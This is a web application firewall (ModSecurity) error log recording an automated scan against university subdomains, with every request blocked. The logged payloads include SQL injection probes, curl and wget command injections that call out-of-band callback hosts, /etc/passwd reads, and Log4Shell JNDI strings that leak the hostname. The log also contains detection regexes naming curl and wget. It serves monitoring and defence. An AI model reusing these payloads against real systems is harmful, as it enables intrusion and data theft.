[Tue Aug 29 11:31:10.394830 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:param: action=sql sql='select md5(999999999)'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10jsCo-f0AAAQSWJ8AAAA0"]
[Tue Aug 29 11:31:10.394888 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:param: action=sql sql='select md5(999999999)'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10jsCo-f0AAAQEGF8AAAAm"]
[Tue Aug 29 11:31:10.396781 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:dir: 'Pa_Noteexpr curl+cjmn8l5jmimk2adbbnlgsuid4sxao6un5.oast.sitePa_Note'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/file_transfer.cgi"] [unique_id "ZO10jsCo-f0AAAPDn4YAAAAP"]
[Tue Aug 29 11:31:10.396977 2023] [:error] [pid 1021] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/pages/systemcall.php"] [unique_id "ZO10jsCo-f0AAAP9Hg0AAAAW"]
[Tue Aug 29 11:31:10.397620 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:param: action=sql sql='select md5(999999999)'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10jsCo-f0AAAQFcP8AAAAn"]
[Tue Aug 29 11:31:10.404710 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:dir: 'Pa_Noteexpr curl+cjmn8l5jmimk2adbbnlgdostzf5pqchfi.oast.sitePa_Note'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/cgi-bin/file_transfer.cgi"] [unique_id "ZO10jsCo-f0AAAPRNfgAAAAf"]
[Tue Aug 29 11:31:10.450918 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:param: action=sql sql='select md5(999999999)'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10jsCo-f0AAAQR43UAAAAz"]
[Tue Aug 29 11:31:11.303450 2023] [:error] [pid 1035] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nodeId[nodeid]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',@@ found within ARGS:nodeId[nodeid]: 1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version),19,20,21,22,23,24,25,26,27-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ajax/api/content_infraction/getIndexableContent"] [unique_id "ZO10j8Co-f0AAAQLC-QAAAAt"]
[Tue Aug 29 11:31:11.307432 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nodeId[nodeid]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',@@ found within ARGS:nodeId[nodeid]: 1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version),19,20,21,22,23,24,25,26,27-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ajax/api/content_infraction/getIndexableContent"] [unique_id "ZO10j8Co-f0AAAQJWqYAAAAr"]
[Tue Aug 29 11:31:11.307670 2023] [:error] [pid 900] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nodeId[nodeid]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',@@ found within ARGS:nodeId[nodeid]: 1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version),19,20,21,22,23,24,25,26,27-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ajax/api/content_infraction/getIndexableContent"] [unique_id "ZO10j8Co-f0AAAOE1k8AAAAC"]
[Tue Aug 29 11:31:11.312650 2023] [:error] [pid 1024] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nodeId[nodeid]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',@@ found within ARGS:nodeId[nodeid]: 1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version),19,20,21,22,23,24,25,26,27-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ajax/api/content_infraction/getIndexableContent"] [unique_id "ZO10j8Co-f0AAAQA-7cAAAAi"]
[Tue Aug 29 11:31:11.324570 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nodeId[nodeid]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',@@ found within ARGS:nodeId[nodeid]: 1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version),19,20,21,22,23,24,25,26,27-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ajax/api/content_infraction/getIndexableContent"] [unique_id "ZO10j8Co-f0AAAPOheUAAAAa"]
[Tue Aug 29 11:31:11.343875 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nodeId[nodeid]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',@@ found within ARGS:nodeId[nodeid]: 1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version),19,20,21,22,23,24,25,26,27-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ajax/api/content_infraction/getIndexableContent"] [unique_id "ZO10j8Co-f0AAAPDn4gAAAAP"]
[Tue Aug 29 11:31:11.980111 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlgm4pxfttaeyukw.oast.site;`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10j8Co-f0AAAPLwD4AAAAX"]
[Tue Aug 29 11:31:11.981056 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlgheke41b4i63jp.oast.site;`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10j8Co-f0AAAPDn4kAAAAP"]
[Tue Aug 29 11:31:11.985413 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlgmgb5g8zboqtge.oast.site;`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10j8Co-f0AAAPOheYAAAAa"]
[Tue Aug 29 11:31:12.008988 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlgyrowzh1i1np6r.oast.site;`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10kMCo-f0AAAQOvzsAAAAw"]
[Tue Aug 29 11:31:12.028245 2023] [:error] [pid 1016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlg7g7xumbumnpcs.oast.site;`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10kMCo-f0AAAP4H-EAAAAI"]
[Tue Aug 29 11:31:12.321038 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlg69na55jn7pzax.oast.site;`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10kMCo-f0AAAQUH9oAAAA2"]
[Tue Aug 29 11:31:13.303681 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{"params":"w. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22| found within ARGS:{\\x22params\\x22:\\x22w: 123\\x5c\\x22'1234123'\\x5c\\x22|cat /etc/passwd\\x22}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/api/edr/sangforinter/v2/cssp/slog_client"] [unique_id "ZO10kcCo-f0AAAQR43sAAAAz"]
[Tue Aug 29 11:31:13.308543 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-831}${:-468}.${hostName}.username.cjmn8l5jmimk2adbbnlgbdgyc9htuwrcr.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ccmadmin/j_security_check"] [unique_id "ZO10kcCo-f0AAAP8GyUAAAAV"]
[Tue Aug 29 11:31:13.309587 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-831}${:-468}.${hostName}.username.cjmn8l5jmimk2adbbnlgph3ir5qz817tb.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ccmadmin/j_security_check"] [unique_id "ZO10kcCo-f0AAAPDn40AAAAP"]
[Tue Aug 29 11:31:13.310631 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{"params":"w. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22| found within ARGS:{\\x22params\\x22:\\x22w: 123\\x5c\\x22'1234123'\\x5c\\x22|cat /etc/passwd\\x22}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/api/edr/sangforinter/v2/cssp/slog_client"] [unique_id "ZO10kcCo-f0AAAOM4dUAAAAU"]
[Tue Aug 29 11:31:13.313007 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{"params":"w. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22| found within ARGS:{\\x22params\\x22:\\x22w: 123\\x5c\\x22'1234123'\\x5c\\x22|cat /etc/passwd\\x22}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/edr/sangforinter/v2/cssp/slog_client"] [unique_id "ZO10kcCo-f0AAAPMmG4AAAAY"]
[Tue Aug 29 11:31:13.314403 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{"params":"w. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22| found within ARGS:{\\x22params\\x22:\\x22w: 123\\x5c\\x22'1234123'\\x5c\\x22|cat /etc/passwd\\x22}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/api/edr/sangforinter/v2/cssp/slog_client"] [unique_id "ZO10kcCo-f0AAAOKNvAAAAAK"]
[Tue Aug 29 11:31:13.322878 2023] [:error] [pid 1027] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-831}${:-468}.${hostName}.username.cjmn8l5jmimk2adbbnlgk14gpj6a5o8d6.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ccmadmin/j_security_check"] [unique_id "ZO10kcCo-f0AAAQDFSIAAAAl"]
[Tue Aug 29 11:31:13.329559 2023] [:error] [pid 1026] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-831}${:-468}.${hostName}.username.cjmn8l5jmimk2adbbnlg4jstkjnjowsoq.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ccmadmin/j_security_check"] [unique_id "ZO10kcCo-f0AAAQCv0IAAAAk"]
[Tue Aug 29 11:31:13.329704 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{"params":"w. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22| found within ARGS:{\\x22params\\x22:\\x22w: 123\\x5c\\x22'1234123'\\x5c\\x22|cat /etc/passwd\\x22}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/api/edr/sangforinter/v2/cssp/slog_client"] [unique_id "ZO10kcCo-f0AAAPLwEEAAAAX"]
[Tue Aug 29 11:31:13.331933 2023] [:error] [pid 1043] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-831}${:-468}.${hostName}.username.cjmn8l5jmimk2adbbnlg1cznhr51m8fwm.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ccmadmin/j_security_check"] [unique_id "ZO10kcCo-f0AAAQTKF0AAAA1"]
[Tue Aug 29 11:31:13.374753 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-831}${:-468}.${hostName}.username.cjmn8l5jmimk2adbbnlg3po7eer1xm1x4.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ccmadmin/j_security_check"] [unique_id "ZO10kcCo-f0AAAQR43wAAAAz"]
[Tue Aug 29 11:31:13.386105 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{"params":"w. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22| found within ARGS:{\\x22params\\x22:\\x22w: 123\\x5c\\x22'1234123'\\x5c\\x22|cat /etc/passwd\\x22}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/api/edr/sangforinter/v2/cssp/slog_client"] [unique_id "ZO10kcCo-f0AAAOM4dYAAAAU"]
[Tue Aug 29 11:31:13.425689 2023] [:error] [pid 1026] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://0.0.0.0 found within ARGS:url: http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/premise/front/getPingData"] [unique_id "ZO10kcCo-f0AAAQCv0MAAAAk"]
